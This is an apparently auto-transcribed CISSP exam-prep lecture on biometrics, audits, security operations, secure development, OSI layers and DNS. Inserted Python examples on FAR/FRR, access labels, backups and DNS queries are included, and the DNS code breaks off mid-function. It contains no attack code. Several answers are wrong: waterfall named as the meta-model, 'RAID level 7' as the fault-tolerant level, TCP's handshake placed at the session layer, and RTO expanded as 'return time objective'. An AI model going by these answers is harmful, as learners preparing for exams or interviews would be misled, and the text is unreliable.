Like captcha so these are the five basic authentication types or mechanisms that you can utilize in an organization multifactor authentication is having multiple of these options in integrated in our identity and access management module to enhance the security now coming back to biometrics biometrics have positives and negatives amongst

Them so uh with the biometric there are two types that we talk about false race of a rate false acceptance rate and false rejection rate what is a false acceptance rate uh somebody let’s say you are using a thumb print to authenticate people somebody put down their thumbprint the person is not

Actually authorized however it was read incorrectly and the door got unlocked and the person got access to that particular area which is a false acceptance rate a false rejection rate is an author authenticated or an authorized person actually trying their thumbprint but it not getting recognized

Does they did not get access to the area or to the device that they wanted now the question here is which of the following is the most important factor while selecting a biometric system for securing critical assets now would i want to focus on false rejection rate or

False acceptance rate then we also have equal error rate and maximum allowable downtime maximum allowable downtime is if the biometric measure fails and if nobody’s getting access to any of the resources to what level or to what extent would my business be able to tolerate such an outage here the

Correct answer is the false acceptance rate because if an unauthorized person gets access to my devices that’s the worst case scenario if the biometric system is down and nobody’s getting access that may still be acceptable rather than having an unauthorized person getting access to very sensitive data false rejection rate is also

Detrimental to the organization however it is not as bad as having a false acceptance rate introduced in the organization the second question which are the two major factors to measure biometric performance again the question from the previous one far false acceptance rate and fr false rejection rate or fse and

Err ier and far fr and gic they don’t actually relate so the correct answer here is far false acceptance rate and false rejection rate so these are the two major factors false rejection rate may still be a little bit acceptable but a false acceptance rate is not tolerable at all next question a
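The FAR/FRR trade-off just described, as an added worked example that is not part of the video: the match scores are constructed, and the threshold helpers are hypothetical, but they show where the equal error rate sits and what driving FAR down to zero for a critical asset costs in false rejections.

```python
"""FAR, FRR and EER computed from biometric matcher scores.

Constructed example (not from the video). A matcher returns a similarity score
per attempt; the system accepts when score >= threshold. Lists below are made up:
GENUINE_SCORES are attempts by enrolled, authorised users, IMPOSTOR_SCORES are
attempts by people who are not authorised.
"""
from typing import List, Sequence, Tuple

GENUINE_SCORES = [0.92, 0.88, 0.85, 0.81, 0.78, 0.74, 0.70, 0.66, 0.60, 0.55]
IMPOSTOR_SCORES = [0.20, 0.28, 0.35, 0.41, 0.47, 0.52, 0.58, 0.63, 0.69, 0.75]


def far_frr(genuine: Sequence[float], impostor: Sequence[float],
            threshold: float) -> Tuple[float, float]:
    """FAR: share of impostors accepted (unauthorised person let in, the worst case).
    FRR: share of genuine users rejected (authorised person locked out)."""
    far = sum(1 for s in impostor if s >= threshold) / len(impostor)
    frr = sum(1 for s in genuine if s < threshold) / len(genuine)
    return far, frr


def candidate_thresholds(genuine: Sequence[float],
                         impostor: Sequence[float]) -> List[float]:
    """Every observed score is a candidate cut-off; a sentinel above the highest
    score represents 'reject everything' (FAR 0, FRR 1)."""
    ts = sorted(set(genuine) | set(impostor))
    ts.append(ts[-1] + 1e-9)
    return ts


def equal_error_rate(genuine: Sequence[float],
                     impostor: Sequence[float]) -> Tuple[float, float]:
    """Threshold at which FAR and FRR are closest; the EER is their mean there."""
    best = None
    for t in candidate_thresholds(genuine, impostor):
        far, frr = far_frr(genuine, impostor, t)
        gap = abs(far - frr)
        if best is None or gap < best[0]:
            best = (gap, t, (far + frr) / 2)
    return best[1], best[2]


def threshold_for_max_far(genuine: Sequence[float], impostor: Sequence[float],
                          max_far: float) -> Tuple[float, float, float]:
    """Lowest threshold whose FAR does not exceed max_far, plus the FAR and FRR
    that choice yields. For critical assets the video argues FAR is the factor
    to bound first, so this is the selection rule a practitioner would apply."""
    for t in candidate_thresholds(genuine, impostor):
        far, frr = far_frr(genuine, impostor, t)
        if far <= max_far:
            return t, far, frr
    raise ValueError("no threshold satisfies the FAR bound")


if __name__ == "__main__":
    t_eer, eer = equal_error_rate(GENUINE_SCORES, IMPOSTOR_SCORES)
    print(f"EER {eer:.2f} at threshold {t_eer}")
    for bound in (0.1, 0.0):
        t, far, frr = threshold_for_max_far(GENUINE_SCORES, IMPOSTOR_SCORES, bound)
        print(f"FAR <= {bound}: threshold {t}, FAR {far:.2f}, FRR {frr:.2f}")
```

On this data the EER is 0.2; tightening the FAR bound from 0.1 to 0 moves the threshold from 0.70 to 0.78 and the FRR from 0.3 to 0.5, which is the trade-off the question is about.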

Next question: a commercial application for steganography that is used to identify documents or verify their authenticity is either a digital checksum, an MD5 hash, a digital signature, or a watermark? Now here the keywords matter. We are talking about steganography, so suddenly people start thinking about hiding data within data, and then if you just isolate the words "identify documents or verify their authenticity", we basically go directly to a digital signature, because that's what we utilize for non-repudiation. However, what the question refers to is an application for steganography. Steganography is hiding some element which would be visible only to known people. We can utilize steganography to benefit ourselves or our organization by using it to identify the authenticity of a document. So if I'm going to print out a document, maybe there is a watermark on the document which is not visible to the naked eye, but when I want to validate the document, I would search for that particular watermark. And that is the correct answer for this particular question. So that's what domain five is all about.

All right, let's look at domain number six, which is security assessment and testing. Now this domain is all about assessments, auditing strategies and testing. So from this domain what you're going to take away is talking about internal audits, external audits, third-party audits, the security control testing, strategizing about how we implement a vulnerability management system, a program within the organization that is repeatable, consistent and measurable, and can be tied up with other management programs like patch management, incident management, and anything and everything that requires a vulnerability assessment, like even change management: if something is going to change in an organization, you can have a vulnerability assessment done before you even think about allowing or disallowing that change. Similarly with penetration testing, to validate the vulnerabilities that you've identified; log reviews; having a SIEM tool that will help you analyze or create a pattern analysis of what's happening within the infrastructure, what's happening within the organization from a security perspective. Then you're talking about collecting security process data, account management. When we say account management: the identity and access management life cycle, so onboarding of an employee, offboarding of an employee, the lateral movements of an employee in an organization when they're getting promoted or they are transferred from one department to another. So all of these would come under security assessment and testing, to see how those policies are functioning, to analyze the effectiveness of those policies, thus the requirement for conducting vulnerability assessments and penetration tests.

So let's look at a few questions on this domain, and let's start off with the first one: which of the following phases requires the involvement of an information security analyst? So out of these four options, systems requirements definition, system design, program development, or program testing, during which phase would you involve a security analyst? Now for this we first need to identify why we require a security analyst: what is the job requirement, what is the activity that is going to be conducted by a security analyst? So in this scenario the correct answer is program testing. In the program development phase we won't need an analyst; we would need a program manager and architects who can develop a particular program, who can give it some semblance of what needs to be achieved. In the system design, it would again be an architect who's going to develop that system. In the systems requirements definition, again, it's a requirements gathering about what you need to adhere to, what is going to be the baseline that you're going to create. So from these four options you need to identify where you would place a security analyst. Right, in the exam it's the most probable answer that you're looking for; it's not the most idealistic answer. So from these four options, security analysts would most likely be involved in the program testing phase rather than any other phase.

The second question: which of the following techniques is generally not used for monitoring purposes? Now when you say monitoring, what is monitoring? Monitoring is looking into logs, activities, anything and everything that has already happened, so you are reacting to something that has already happened. And which of these following techniques is not used for monitoring? So you're collecting logs, you're analyzing those logs; what would not be utilized: a penetration test, intrusion detection, violation processing, or countermeasures testing? Right, now when you're monitoring, you would monitor a penetration test to analyze if the test was successful or not. Intrusion detection: that's the first input that you look at for analysis. Violation processing: if anything is violated, any processes, any policies, you analyze them and you monitor them, thus you come to know that this has happened. In countermeasures testing, there's basically a test of the effectiveness of the countermeasures that are already implemented; at that point in time you may not be monitoring these.

The software program that acts on behalf of a user in their absence to carry out operations is known as an agent, worm, applet, or browser? So a program that acts on behalf of a user in their absence to carry out operations is either an agent, an applet, a worm, or a browser. A browser is nothing but software that allows you to surf the Internet. A worm is a malicious application that would be more of a nuisance value than anything else. An applet is something that allows you interconnectivity. An agent is something that can be automated, used for automated tasks, and can run those tasks in the absence of a particular user. So if you look at these questions: understanding what each and every word means, understanding and highlighting the keywords in the question itself, and then analyzing the scenario that you are placed in, and then identifying the most appropriate answer for that particular question, that is how you want to approach a CISSP exam.

Looking at the next domain, domain number seven, and that's security operations. Let's look at what security operations has for us. Now in security operations you're looking at a SOC, a security operations center, so your regular vulnerability management, incident management, problem management, change management, placing controls, analyzing all that information, so probably having a SIEM tool, configuring the SIEM tool, collecting all that data, so identifying event sources. What are event sources? When I have a SIEM implemented, I am not going to expect the SIEM to automatically start collecting data all by itself, and then again I don't expect the SIEM tool to understand what kind of data it needs to collect. So for me, in a security operations center, after I've installed a SIEM tool, I first need to configure it to identify which devices I want to monitor, from which devices I want to collect that information, and where I want to store it. Once I have all that information in place, after that I'm going to analyze that data to identify if anything has been going on incorrectly, or if there is any security incident that has happened, and those would be raised as incidents and that would be sent to the SOC team for analysis and then an incident response. Similarly, intrusion detection and prevention logs would be utilized to identify something that may have been missed by the IDS/IPS itself. You're going to place controls for investigations, like administrative controls, which would be policies that you have made; then you've got criminal laws: if something bad has happened that can be described as a crime based on the law of that land, how you're going to deal with it; civil laws; regulatory laws; and industry standards. Regulatory laws would be, for example, GDPR in the European Union. A civil law would be where no criminal activity has happened, but let's say there's a breach of contract between two organizations and a civil lawsuit has been filed against an organization for breach of service level agreements. Regulatory would be the GDPR act, where you have to report to a regulatory body, and if there are any flaws you could be fined. Industry standards: ISO 27001, PCI DSS and so on and so forth. So when you're looking at these requirements for investigation, all of these would have prescribed how you're going to handle that investigation. If it is a criminal investigation, an organization by itself doesn't have the right to investigate; they have to go to a law enforcement agency, and there is a procedure to follow. In case of a civil lawsuit, there are lawyers who would deal with this kind of activity: send out notices to the other party, then go to a court of law to file a lawsuit over there. In GDPR there are timelines on how you're going to report a breach or how you're going to report an incident, and so on and so forth.

So in security operations you're creating a security operations center in alignment with all of these five requirements. You're going to look at logging and monitoring activities, having that SIEM tool which will identify those devices that you want to monitor and collect relevant information that is prescribed based on all those five investigation types that we just discussed. Then, when you're looking at identification of assets, you go back to your asset inventory, your asset register; you look at all the assets that you have, and then you make your strategy and plan how you want to collect those logs. And then this module will deal with how you want to handle identity and access management, privileged account management, service level agreements, and so on and so forth. So this basically is the day-to-day business activity of an organization from a security perspective. So you are there to identify incidents; as a CISSP you won't be executing this, but you would be creating policies revolving around all of these aspects. So yeah, this is what you need to consider, this is what you need to strategize upon, and this is what you want to advise the organization on, as to what needs to be in place to be more effective from a security perspective.

Let's look at a few questions from this domain. How does a subject get access to an object in a multi-level security policy? Now first we need to understand what a multi-level security policy is; we need to understand what a subject is and what an object is. Let's look at the options first: the subject sensitivity label must dominate the object sensitivity label; the subject sensitivity label subordinates the object sensitivity label; the subject sensitivity label is subordinated by the object sensitivity label; and, to repeat the sensitivity tags again and again, the subject sensitivity label is dominated by the object sensitivity label. Too much sensitivity in a single slide! However, you can see that this just confuses the reader about what they're trying to read, and not only that, you're missing what the keywords are. So people normally focus on a keyword called "multi-level security policy" and start getting confused in that, while we disregard what a subject and an object are. So a subject and an object are a relationship that is created in identity and access management: the subject being the user, the object being the resource that needs to be accessed by that particular user, after which comes a multi-level security policy, which is basically the access control matrix that you have created between these multiple objects and multiple subjects. So for example, in this domain you would also talk about theoretical models for access management, including the lattice-based approach, where the sensitivity labels come into the picture; you would talk about the Clark-Wilson model; you will talk about the Bell-LaPadula model and a few other models, all of them theoretical in nature, which can then, based on other implementations, be implemented in a real-time scenario. So all that understanding comes into the picture, and then you need to identify how those sensitivity labels in a lattice-based approach could allow you to create those labels for your subjects and objects, and then the identity and access management tool would become the verification factor, where it identifies the labels for the subject and the object, and based on those labels they allow or disallow connectivity, or allow connections to happen. Now here the correct answer is that the subject sensitivity label must dominate the object's sensitivity label. So the user should have a sensitivity label that allows them access to the object, which has an equivalent sensitivity label. So understanding those models becomes very important, not only from an exam's perspective.
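The dominance rule behind that answer, as an added example that is not part of the video: labels are modelled as a lattice of classification level plus categories (the category part goes beyond the single-level case in the question), with the Bell-LaPadula read rule, subject must dominate object, and its matching no-write-down rule; level names, categories and objects are all constructed.

```python
"""Lattice-based sensitivity labels with Bell-LaPadula access checks.

Constructed example (not from the video). A label is a classification level plus
a set of categories (compartments). Label A dominates label B when A's level is
at least B's AND A carries every category that B carries. Two labels with
disjoint categories dominate neither each other, which is what makes this a
lattice rather than a plain ladder of levels.
"""
from dataclasses import dataclass
from typing import FrozenSet

# Ordered classification levels (hypothetical names, lowest first).
LEVELS = {"unclassified": 0, "confidential": 1, "secret": 2, "top_secret": 3}


@dataclass(frozen=True)
class Label:
    level: str
    categories: FrozenSet[str] = frozenset()

    def __post_init__(self) -> None:
        if self.level not in LEVELS:
            raise ValueError(f"unknown level: {self.level}")

    def dominates(self, other: "Label") -> bool:
        """True when this label is at least as sensitive as `other` in both dimensions."""
        return (LEVELS[self.level] >= LEVELS[other.level]
                and other.categories <= self.categories)


def can_read(subject: Label, obj: Label) -> bool:
    """Simple security property ("no read up"): the subject must dominate the object."""
    return subject.dominates(obj)


def can_write(subject: Label, obj: Label) -> bool:
    """*-property ("no write down"): the object must dominate the subject, so a
    high-clearance user cannot copy what they know into a lower-labelled object."""
    return obj.dominates(subject)


def decide(subject: Label, obj: Label, action: str) -> bool:
    """Single choke point for every access decision, the job the question calls
    'mediating' subject/object relationships."""
    if action == "read":
        return can_read(subject, obj)
    if action == "write":
        return can_write(subject, obj)
    raise ValueError(f"unsupported action: {action}")


if __name__ == "__main__":
    # Constructed HR/payroll scenario, echoing the HR example used earlier in the course.
    hr_head = Label("secret", frozenset({"payroll"}))
    objects = {
        "payroll_db": Label("confidential", frozenset({"payroll"})),
        "medical_records": Label("secret", frozenset({"payroll", "medical"})),
        "board_minutes": Label("top_secret"),
    }
    for name, obj in objects.items():
        print(f"{name}: read={decide(hr_head, obj, 'read')} "
              f"write={decide(hr_head, obj, 'write')}")
```

Note that the HR head can read the payroll database but not the medical records (a missing category, not a lower level), and can write up into them but not down into the payroll database.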

When you're creating a policy, you are basically going to use these terminologies, and you're going to create a policy around this.

Moving on to the second question: managers of which department are ideal for the development of information security policy for an organization: business operations, information technology, purchase, or human resources? Now, managers of which department are ideal for the development of information security policy for an organization? When we say information security policy, we would obviously assume that it is the IT department who's going to deal with it, and it's "information technology" in this case. But that's incorrect. It is business operations. Why? Because right from the first domain, we would be taught in the training for CISSP that security needs to enhance the business functionality, not the other way around. So we are in the business, or we are in the function of conducting a business which would offer services, and those services that are being offered, the business activity that is being conducted, should be supplemented by security, so those business activities can be conducted in a secure manner. At no point in time is security going to be a deterrent to business. The only reason for anything to become a deterrent to business is the legality of it: if a business is illegal, it will not happen, or it should not happen; however, if the business activity is legal, then security should not stop that activity from happening. Security should be implemented in such a way that the business activity is strengthened, there is security embedded within it, secure by design, and then the business activity goes on. So even if you're a chief information security officer or a security manager and you go and talk with the board of directors or the steering committee, as the terms you will come across in this training, you will understand that it's these people who would define how the business is going to work, what kind of business activity you're going to do, and then you provide the security around it. I'll give you an example here: let's say I'm an online retailer and I want to sell goods online, which is legal; I'm selling all legal goods. Now I want the security team to come in, and they would help me to secure the function of being an online e-tailer, if you will. My security team is not going to come and tell me not to go into that business, or to stop some services because they may be insecure. The security team's requirement is that if I want to sell goods online, they need to now create an architecture of devices, of clouds, or whatever is required to make it secure. So thus the managers of business operations will always be the ideal department for the development of information security policies: they decide what business is going to happen, and then the security team just complements it by adding the security to it. For example, going on with this: a website is launched with HTTP; the security team comes into the picture and says data in motion needs security, so we're going to convert it into HTTPS; and at no point in time are they going to say HTTP is vulnerable, so we are not going to do this, we'd rather become a wholesale shop or something like that. I'm just giving an example, and rather than me just rambling on, let's move on to the next question.

Question three: installing malicious software on the system to allow future backdoor access leads to violation of what integrity? Does it violate the data, system, user, or network integrity? Now, malicious software on a system to allow future backdoor access: so what are we doing here? We are basically installing software or an application on a particular system which allows a hacker backdoor access to the system. So this would violate the integrity of the system itself. Right, the data would be compromised, but the data would be compromised because the system got compromised. A user doesn't matter, because a backdoor is a backdoor entry where you can get access without even logging in as a user, and a network is just a way of communication at this point in time. But the sense being that the system got infected, and through that infection you got access to whatever was on that particular system. Now that's domain number seven.

Domain number eight, which is the last domain in the CISSP exam, is software development security: SDLC or SSDLC, secure software development life cycle. That's what is discussed in this domain. Let's go back to the CISSP guide and see what this domain would consist of. So, software development security. Now you can see software development life cycles coming in, so they're going to talk about different life cycles like the waterfall model, they're going to talk about Agile, they're going to talk about modified waterfall. This module also will talk about DevSecOps, DevOps, and anything and everything that would be there within the software development life cycle. Now when we say software development life cycle, the essence of a CISSP is to add another S to the SDLC: the SDLC stands for software development life cycle; the CISSP adds one more S, as the secure software development life cycle. So, as with everything, secure by design, which means security needs to be integrated at every phase of the life cycle and should not be bolted on. For example, a waterfall model talks about how the software is going to be developed and how it is going to be published or released at the end of the life cycle; at no point in time does it talk about security. So the security architect at that point in time would come into the picture and decide what the requirements of the software are, what the security vulnerabilities or the risks are that they see, so threat modeling would happen, and all those things need to be introduced right from the inception.

So if there are developers, or if there is a business requirement for an application, let's go back to the previous example: I'm an e-tailer. So to become an e-tailer, not only do I need a website, I will need a web application for that function, and it will be given out. So I need to develop that application. In a regular life cycle model, I develop that application and then go into security, where I do a VAPT on that application, find out that there are disastrous results, and then I go back and start coding again, which is not a good scenario. So I have hired a CISSP who will then come into the picture during the SDLC, at the inception itself, when business people are talking about how the business is going to happen. At that point in time the CISSP will come in and start with a threat modeling exercise, saying, you know what, let's talk about what are the risks this application is going to face: you're going to handle a lot of payment information because people need to pay for the products, right, so credit cards are going to be involved; there's a database, so SQL injection attacks. So these are the threats that we're looking at, and now a threat modeling exercise would be followed by a risk assessment, then would be looked upon by an impact analysis, and then based on that you will prioritize those risks. You will then educate your developers to use secure coding practices; at the same time, security testing would be done to see how the application is evolving; and then, by the time the software development life cycle comes to an end, you would have secure software which had security by design integrated since the inception, rather than having it bolted on.

Now this is the ideal scenario that you're looking for. The expense and the budgeting, that's where the balance of capital investments and time to market and all that comes into the picture. But for the training we will always be in an ideal scenario: we'll always have enough time, enough resources, monetary and human, and the exam basically looks at a very ideal scenario in which you've got just about everything; you just need to make the correct decision. At no point in time are you going to think that if I start doing a particular strategy it is going to cost me a lot of money, so I don't want to do that. That's the real-world scenario: in the real world you look at the costs, you look at the timelines, deadlines, and then you take an informed decision of how much you want to invest in what. In the ideal world, for the CISSP exam, there are no limitations; you are looking at the most correct way

Of doing those things and thus you are you identify those requirements and that’s how you answer the exam so you’re looking at the security software environments that you require configuration management auditing and logging of changes security impact of acquired software now in this scenario we talked about developing a software

What if i purchase a third-party software and i introduce it into my organization now this software when integrated how is it going to impact my current security controls impact my current identity access management my networking my other applications my communications so that’s something that you want to assess as

Well, right, so let's go for the questions. Question one: in which of the following RAID levels does the drive array continue to operate even if any disk fails? Now, in the actual exam they are not going to be very technical; it's a managerial exam, so they may not ask you these kinds of questions, but the knowledge is still required. So you need to know that there is something called RAID, and the different levels of RAID, because you might want to use that as a solution in a particular situation. How you want to implement RAID and all of that, that's not the knowledge that we want, but in this scenario RAID level 7 is the ideal answer.

Question two: which of the following steps can be used to protect an organization against the failure of a critical software firm? Now, basically, what does this talk about? This talks about disaster recovery, or this talks about business continuity. For example, there's a failure of some sort; when there is something that fails, what does it do? It interrupts the business. So the moment a business interruption happens, what should kick in? The business continuity plan. If the business continuity plan fails, then the disaster recovery plan kicks in. So if you look into it as we go on, we might even come up against terminologies like RTOs and RPOs, return time objective and recovery point objective, and at that point in time you want to look at how we want to recover from a data loss, and thus you will come across solutions.

Now, of the four options, full backups, differential backups, incremental backups, and the fourth one, software escrow agreement, what is the difference between these? A full backup is a complete backup of the entire data that you have. Now, it sounds easy, but in an organization data could be terabytes, petabytes, and to do a complete backup might take days, weeks or a lot of time, right? It's not just copying one megabyte from a hard disk to a USB drive and being done with the backup.
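The three backup types named among the options above, simulated as an added example that is not part of the course material: a constructed week of file changes, a full backup on day 0, and then either nothing (weekly full only), a differential or an incremental backup at the end of every following day. `restore()` works out how many backup sets each strategy needs to apply and which files cannot be brought back to their latest version when the failure happens mid-week; `files_copied()` shows the price each strategy pays in copies written. The file names and change log are invented for the example.

```python
# Added example, not part of the original course. Simulates full, differential and
# incremental backups over one constructed week of file changes and shows what a
# restore needs and what is lost when a failure happens mid-week.

# Constructed change log: which files were written on each day. Day 0 is the day
# the weekly full backup is taken, so it lists every file that exists.
CHANGES = {
    0: {"orders.db", "catalog.db", "users.db", "logs.txt"},
    1: {"orders.db"},
    2: {"orders.db", "logs.txt"},
    3: {"catalog.db"},
    4: {"orders.db", "users.db"},
    5: {"logs.txt"},
    6: {"orders.db"},
}


def state_at(day):
    """Map every file to the day it was last written, as of the end of `day`."""
    versions = {}
    for d in range(day + 1):
        for name in CHANGES.get(d, ()):
            versions[name] = d
    return versions


def backups_taken(strategy, last_day):
    """Backup sets taken at the end of each day 0..last_day.

    Each set maps file -> version captured. Day 0 is always a full backup;
    'full' takes nothing else until next week, 'differential' copies everything
    changed since the full, 'incremental' copies only that day's changes.
    """
    sets = [("full", state_at(0))]
    for d in range(1, last_day + 1):
        if strategy == "differential":
            sets.append(("differential", {f: v for f, v in state_at(d).items() if v > 0}))
        elif strategy == "incremental":
            sets.append(("incremental", {f: d for f in CHANGES.get(d, ())}))
    return sets


def files_copied(strategy, last_day):
    """Total number of file copies written to backup media through `last_day`."""
    return sum(len(files) for _, files in backups_taken(strategy, last_day))


def restore(strategy, failure_day):
    """Simulate a loss during `failure_day`, before that day's backup runs.

    Returns (number of backup sets that must be applied, files whose latest
    version cannot be recovered).
    """
    available = backups_taken(strategy, failure_day - 1)
    if strategy == "differential":
        # Only the full plus the most recent differential are needed.
        chain = available[:1] + available[-1:] if len(available) > 1 else available
    else:
        # 'full': just the weekly full. 'incremental': the full plus every increment, in order.
        chain = available
    recovered = {}
    for _, files in chain:
        recovered.update(files)
    current = state_at(failure_day)
    lost = sorted(f for f, v in current.items() if recovered.get(f) != v)
    return len(chain), lost


if __name__ == "__main__":
    for strategy in ("full", "differential", "incremental"):
        sets, lost = restore(strategy, failure_day=6)
        print(f"{strategy:>12}: copies written={files_copied(strategy, 6):2d} "
              f"sets to restore={sets} lost={lost}")
```

With a failure on day 6, the weekly-full-only strategy loses every change made during the week, exactly the situation described above; differential and incremental both lose only the day's unsaved work, but differential restores from two sets while incremental must replay all six.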

So full backups may be possible, but not on a regular basis. So maybe you do a full backup every week, which means that if the data loss happens at the end of the week, then you have lost the data for an entire week, because the backup was last week. Thus it's not a very good solution, and to complement that we could use incremental backups and differential backups. So the training would include all of these definitions of what these backups are and what happens.

And then the fourth option, software escrow agreement: what is that? Now, in a software development or a software life cycle, if I have purchased a software from a third party, my biggest risk is not of me getting hacked or the software getting hacked. From a business continuity perspective, the biggest risk is if the software provider goes bankrupt, or is taken over by somebody else, or stops supporting the software. Then what am I to do? Because I may have invested millions of dollars, and reinvesting into a different product and migrating to a different product would be expensive, very costly, and very time consuming. So what do I do at that point in time? So there is an option for a software escrow agreement. What does that mean? That the source code of that software is placed in an escrow, which means, let's say, in a bank, where the bank will hold the source code in a secure manner, and the source code cannot be accessed or modified either by the developing organization or the purchasing organization; it just sits with the bank. If the developers go out of business or they stop supporting it, at that point in time the escrow can be opened and the purchaser, that's us in this case, can still get the source code. So now we can develop the software, or we can go into the source code, analyze it and save ourselves from a disaster. Right, so these are the four options. Now, here you're talking about the critical software firm that failed; you're not talking about data that failed. So the correct answer here is the software escrow agreement.

Right, question number three. Now here we come across the phrase development model: which one of these is a meta model that incorporates several other software development models? Are we looking at waterfall, modified waterfall, spiral or critical path? Here the correct answer is the waterfall model.

We are going to look at ten different questions on networking, then we'll have ten more questions on software and programming, another twenty questions on operating systems and applications, ten questions on cyber attacks, and then finally ten questions on cryptography. So we're going to discuss over fifty-odd questions across these different fields, which will help you crack your interviews as far as cyber security is concerned.

Let's start off with the networking questions. Question one: what is the OSI model? Explain the different layers of the OSI model. OSI largely is a theoretical model utilized to understand networking, how data packets are created and how they are processed by a computer. This is normally used by the TCP/IP, transmission control protocol over internet protocol, software suite. So OSI is known as the open systems interconnection model. It is a reference model that describes how applications are going to interact via the computer network. There are seven different layers that we need to understand; they are as follows. So in this diagram there are these seven different layers. We start off from the bottom: first is the physical layer, then the data link layer, network layer, transport layer, session layer, presentation and application. When such a question is asked in an interview, it is not only that we identify these seven layers: we explain what the OSI model is in the first place, we then identify the seven layers, and we give a brief description of each and every layer. If there are any additional questions, they will come after this basic question.

So let's start off with the physical layer. This is the lowest layer of the OSI model. Now, this is where any and every physicality of your computer comes into the picture, so it could be a network interface card, it could be an RJ45 or a Cat5 cable, anything that allows data to be transmitted physically from your machine to another machine. Next comes the data link layer. So on the data link layer, as far as networking is concerned, we just need to understand that a data packet is encoded and decoded into bits at this layer. This is also the layer that deals with MAC addressing, so the physical address of every network interface card, which is the MAC address, which is utilized to route data packets over the network: this is where the MAC address resides, on the data link layer. The next layer is the network layer. Here datagrams are transferred from one to another. The functions of this layer are routing and logical addressing. The moment we talk about routing and logical addressing, IP addresses come into the picture, IP version 4, IP version 6. So the network layer will deal with IP addressing and the routing of those packets.

Then comes the transport layer. This is the layer responsible for end-to-end connections. That automatically signifies that this is where TCP and UDP will be working. TCP stands for transmission control protocol, UDP for user datagram protocol. TCP is a connection-oriented protocol whereas UDP is a connectionless protocol. These two protocols are utilized to establish connectivity between two machines. TCP is a more reliable method of connectivity because there are a lot of packets that are sent across to verify that the data has been sent, the data has been received, and so on and so forth, whereas UDP is a connectionless protocol where data is just dumped without verifying whether the receiver actually receives that data or not. So in a nutshell, on the transport layer TCP and UDP make their appearance, and this is where that functionality lies.

Then comes the session layer. This controls signals between the computers; it establishes, maintains and terminates connections between processes. So in the transport layer we talked about TCP and UDP, UDP being a connectionless protocol where data is just transmitted without verifying whether the receiver received that data or not, whereas TCP, we studied, is more of a reliable protocol, thus there are different packets, signals, that will be sent across to verify that data has been transmitted, it has been received properly, and then the next segment of that data is sent. So those control signals are established using the session layer; so the three-way handshake of TCP, the acknowledgement packets and those kinds of packets will be taken care of on the session layer of the OSI model.

Then comes the presentation layer. The presentation layer is responsible for translating data into the application layer format, so the formatting, right, MIME or the encoding that is being utilized, the UTF-8 character set that we utilize for presentation, encryption mechanisms, all of these work on the presentation layer. And finally comes the application layer, where the application itself uses a particular protocol so that the other machine on the receiving end, the application on that machine, would be able to understand what the communication was about.

Right, so in a nutshell, if I start from the top, the application layer will deal with any of the data that the application is generating. So maybe a user input: you're logging in, you're typing the username and password; all that data will be constructed, let's say, into an HTTP or HTTPS format. That's where the application layer comes into the picture. Then the formatting of that into UTF-8 and the encryption of it would be done at the presentation layer. Then the transport layer and the session layer would kick in to establish a TCP session, do the three-way handshake, establish that connectivity. IP addressing would be done on the network layer, MAC addressing would be done on the data link layer, and when everything is ready, on the physical layer the packet will be sent out. At the receiving end the packet will be received on the physical layer, and then all these layers will be reversed, and finally at the application layer the data would be presented to the application, which would then execute it and showcase it on the screen of the recipient.

So this is the way you want to explain this question. You want to be very concise and precise about what you're explaining. You don't want to go into too many hypothetical scenarios, you don't want to go too deep into the layers; you just want to give the basic functionality, want to demonstrate that you understand what the OSI model is, how the computer functions, and you want to move on from there. If the interviewer has any further follow-up questions, they will ask those specific questions.

So that's question one. Moving on to question two. Question two is: define unicasting, multicasting and broadcasting. Now, this is a question which can be very lengthy, but again, most of your interview questions are designed that way; it's basically to understand how much you are conceptually aware of these technologies. So you have to be very concise; don't go rattling on about technology too much, but in a concise manner just try to explain what these things are.

So when data is being transmitted over a network, it can be transmitted in one of these particular manners: it can either be a unicast, a multicast or a broadcast. So what is unicast? Unicast is when a message is sent from a single user to a single receiver, so one to one, right? So one machine talking to another machine and nobody else; also known as point-to-point communication, one point to another point. If you have to send information to multiple receivers, then you will have to send it using multicast, right? So this is where your multicast networking comes into the picture. So in our case, let's assume it's a network where there is a class C network, approximately 255-odd machines, and within these there are two machines that want to talk to each other. If they want to talk between each other, it would be a point-to-point communication where they will utilize unicast, where only these two machines will have visibility of that conversation and the other machines will not even realize that this conversation is taking place. If one machine wants to talk to multiple machines, then multicast comes into the picture. As the name suggests, in this mode of communication data is sent from one or more sources to multiple destinations. Multicast uses the internet group management protocol, also known as the IGMP protocol, to identify groups. So under this IGMP protocol various groups are created where machines are subscribed to those particular groups, and whenever a message needs to be sent to those groups it will be identified by the IGMP protocol and then that particular message will be sent to those multiple machines that are members of those particular groups. And then comes the broadcast. The third method is known as the broadcast; as it says, it is going to broadcast to all. So this is one to all, that is, communication between a single user and all the machines in that particular network. Right, so the three ways: unicast is one to one, multicast is one to many, and broadcast is one to all.

Then question number three: what is DNS? DNS stands for domain name system. It is like the internet's phone book, responsible for mapping the domain name to its corresponding IP address. Let me give you an example over here. Whenever we go and open up, let's say, a browser, a Google Chrome browser, we type in www.google.com and then we press enter, and magically Google comes in front of us, the website rather. Now, how does the computer know who Google is? Because as far as we are concerned, humans understand Google and words like that; computers don't. Computers deal with binary, zeros and ones, right? And as far as the internet is concerned, they will only deal with IP addresses and MAC addresses. So how does a computer know how to find google.com and where it is located? So the moment we type google.com in the browser window, in the address bar, and press enter, a DNS query is generated automatically by the browser, where a packet is sent to our DNS servers asking what the IP address is. So in short, DNS resolves domain names to their corresponding IP addresses. There is a DNS server which will have this index, a database of all the domains associated with their IP addresses.
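The query packet the browser sends and the answer the DNS server returns, as an added example in raw DNS wire format (this is illustrative code, not the course's material, and it does not touch the network): `build_query()` produces the A-record question for a name, `build_response()` constructs the reply a server would send (with the usual compression pointer back to the question name), `parse_message()` decodes either, and `accept_response()` applies the check a resolver must make before trusting a reply, namely that its transaction ID and question match the query it actually sent. The name and address used are the ones from the course's cybersecurity.com example; the transaction ID and TTL are arbitrary.

```python
# Added example, not part of the original course: build the DNS query a resolver
# sends for an A record, and parse the answer, in raw wire format (RFC 1035).
import struct

QTYPE_A = 1
QCLASS_IN = 1


def encode_name(name):
    """'cybersecurity.com' -> b'\\x0dcybersecurity\\x03com\\x00' (length-prefixed labels)."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(name, txid=0x1234):
    """12-byte header (ID, flags with RD=1, one question) followed by the question."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def decode_name(msg, offset):
    """Read a possibly compressed name; return (name, offset just after it)."""
    labels = []
    end = None          # where parsing resumes once a pointer has been followed
    while True:
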